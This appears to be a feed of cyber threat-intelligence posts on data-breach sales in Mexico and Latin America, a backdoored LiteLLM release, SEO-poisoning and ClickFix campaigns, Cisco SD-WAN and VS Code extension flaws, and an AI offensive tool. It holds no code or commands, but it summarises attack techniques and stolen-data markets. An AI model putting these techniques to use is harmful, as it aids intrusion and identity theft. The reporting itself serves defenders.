ThreatWardude

🚨 INTELLIGENCE ALERT: Massive Leak of 500,000 SAT Records – Mexico 🇲🇽📉 Our Analyzer platform has detected a high-impact security breach targeting Mexico's tax infrastructure. Threat actor s1ethx7z has put up for sale a database containing detailed information on half a million taxpayers registered with the Tax Administration Service (SAT). Victim: SAT Taxpayers (Mexico) 🏛️. Threat Actor: s1ethx7z 🎭. Volume: 500,000 RFC records. Date: March 26, 2026 🗓️. 📋 Compromised Data (PII and Tax Profile) This leak is extremely dangerous because it combines official identifiers with details regarding the citizens' economic activity: 🔹 Legal Identifiers: Full names, CURP, and RFC. 🔹 Contact Information: Physical addresses and phone numbers. 🔹 Tax Profile: Tax regime, economic activity, email address, and SAT status. Monitor: https://t.co/wk9bZJ3laQ #CyberSecurity #Mexico #SAT #RFC #DataBreach #s1ethx7z #IdentityTheft #FiscalSecurity #InfoSec #CyberAlert #HackingNews #CURP #SATMexico

🛑 Malicious LiteLLM versions 1.82.7–1.82.8 deploy credential theft, Kubernetes lateral movement, and a persistent backdoor. Linked to the Trivy CI/CD compromise, the payload runs on import or via .pth at Python startup, spreads across nodes, and installs a systemd service. 🔗 Full story → https://t.co/YTx4kbP7kh

The cybercriminal threat actor tracked by Microsoft Threat Intelligence as Storm-2561 is running an SEO-poisoning campaign that redirects people searching for enterprise VPN software to spoofed sites and malicious ZIP downloads leading to credential theft. https://t.co/KzTN7J6Rck The ZIP file contains a malicious, digitally signed installer that masquerade as a trusted VPN client. The attack chain ultimately loads a variant of Hyrax infostealer that captures VPN sign-in credentials and VPN configuration data, and exfiltrates it to attacker infrastructure. Read the full Microsoft Defender Experts analysis of the tactics, techniques, and procedures (TTPs) and indicators of compromise of this Storm-2561 campaign, and get protection, detection, and hunting guidance:

INTERPOL dismantled 45,000 malicious IPs and servers tied to phishing, malware, and ransomware. Operation Synergia III across 72 countries led to 94 arrests, 110 suspects under investigation, and seized devices and servers tied to global scam infrastructure. 🔗 Read → https://t.co/O0FCeTYypF

📌Cisco Catalyst SD-WAN Vulnerabilities Allow Attackers to Gain Root Access Source: https://t.co/3Lpm6KmwVO An urgent security advisory from Cisco warns that multiple vulnerabilities in Cisco Catalyst SD-WAN Manager could allow attackers to bypass authentication, gain root access, and overwrite critical files. Two of these vulnerabilities are already being exploited in the wild by hackers, making immediate remediation critical.​ The advisory details five vulnerabilities, led by CVE-2026-20129, a critical authentication bypass flaw with a CVSS score of 9.8. #CybersecurityNews

Microsoft Defender Experts identified a widespread ClickFix social engineering campaign in February 2026 leveraging Windows Terminal as the primary execution mechanism. Rather than the traditional Win + R → paste → execute technique, this campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, guiding users into a privileged command execution environment that blends into legitimate administrative workflows and appears more trustworthy to users. This approach bypasses detections specifically tuned to Run dialog abuse while exploiting the legitimacy and familiarity of Windows Terminal. Once the terminal is opened, targets are prompted to paste malicious PowerShell commands delivered through fake CAPTCHA pages, troubleshooting prompts, or verification-style lures designed to appear routine and benign.

🚨 Hackers Leveraged CyberStrikeAI Tool to Breach Fortinet FortiGate Devices Source: https://t.co/9gSGFPiFqU A new artificial intelligence (AI) offensive security tool called CyberStrikeAI, which is being actively leveraged by threat actors to target edge devices, particularly Fortinet FortiGate appliances. This open-source platform, developed by a China-based individual with potential ties to state-sponsored operations, represents a significant escalation in the weaponization of AI for cyber attacks. It features role-based testing, specialized skills systems, and comprehensive lifecycle management capabilities, all accessible via a centralized dashboard. #cybersecuritynews #Fortinet

⚠️ Four popular VS Code extensions expose developers to file theft and remote code execution. Researchers say 125M+ installs are affected. Flaws in Live Server, Code Runner, and others enable localhost abuse, malicious configs, and code injection—some still unpatched. 🔗 Read → https://t.co/l7bOPlL1qK

🚨 Latin America Cyber Threat Alert | Dec 2025 – Feb 2026 LATAM is experiencing one of its worst cyber threat surges — massive government breaches, military database sales, biometric data theft, and ransomware. Thread 🧵👇 🇧🇷 Brazil — CATASTROPHIC government data exposure → Brazilian ARMY database for sale: 30 GB / 50M citizen records (names, CPFs, addresses, army rank, blood type) — $200 on BreachForums → PRODESP (São Paulo): 200 GB / 2M facial images + CPFs leaked → Repediu e-commerce: 21.4M customer records breached → Atacadão S. Furtado: 3,644 employee payroll records (salaries, CPFs, FGTS contributions) → Domain Admin access to a $10M Brazilian business services firm on sale (FortiGate + 115 hosts) → Sumek Brasil: website defaced by Z-BL4CX-H4T Plus ransomware: The Gentlemen hit Agis (major engineering/construction group) and UNIGRANDE (university). 🇦🇷 Argentina — Biometric & identity data under siege → 637K driver license records for sale (350 GB) including biometric assets — priced at $700-$1,800 → 58,680 citizen photos scraped from government TAD system (filenames = DNI numbers) 🇨🇴 Colombia — Government & aviation targeted → Root-level access to Colombian Government Emergency Response Agency on sale (Linux firewall, RCE, shell + admin panel) → Avianca airline: 6M passenger records for sale on dark web (names, emails, document numbers) 🇨🇱🇵🇪🇵🇦 Chile, Peru, Panama — Govt hits across the region 🇨🇱 Chile: Instituto Nacional de Derechos Humanos (INDH) — human rights watchdog hit by The Gentlemen ransomware 🇵🇪 Peru: Root RCE + shell access to capital’s regional government portal on sale 🇵🇦 Panama: Universidad de Panamá breached — passwords stored in PLAIN TEXT. Student/staff data exposed. 🇻🇪🇩🇴🇸🇻 Venezuela, Dominican Republic, El Salvador 🇻🇪 Venezuela: 65K Bancrecer bank records for sale (account numbers, balances, transaction history) 🇩🇴 Dominican Republic: Telemon SRL ISP — 42K customer records leaked (IDs, addresses, GPS coordinates, debt info) 🇸🇻 El Salvador: Access to two radio stations on sale via Pharaoh’s Team Market 🔑 Key LATAM takeaways 1⃣ Brazil is the #1 target — military, state govt, and private sector all compromised simultaneously 2⃣ Biometric data theft is surging (facial images, driver license photos, DNIs) 3⃣ The Gentlemen ransomware is emerging as a focused LATAM threat actor 4⃣ Government root-level access is being sold cheaply on forums 5⃣ Every major LATAM country has active threat exposure right now

The latest Microsoft Threat Intelligence Podcast episode dives into tactics shaping financially motivated cybercrime as exemplified by Storm-0727, and threats against the financial services industry. https://t.co/zHq1TaL1lj Storm-0727 uses classic, tried-and-tested techniques, including effective social engineering and deceptive domains, to target cryptocurrency exchanges, blockchain startups, gaming platforms, financial institutions, and even government organizations. Across the broader financial services industry, three interrelated trends that take advantage of human and technical weaknesses continue to define the threat landscape: ransomware and extortion, social engineering and phishing-as-a-service (PhaaS) platforms, and business email compromise (BEC). In discussing these topics, Sherrod DeGrippo, Megan Stalling, and Anna Seitz stress that cybercriminals often use the simplest method that works. They don’t need cutting-edge techniques, just effective ones. Strong credential hygiene, timely patching, and relentless disruption remain defenders’ best tools.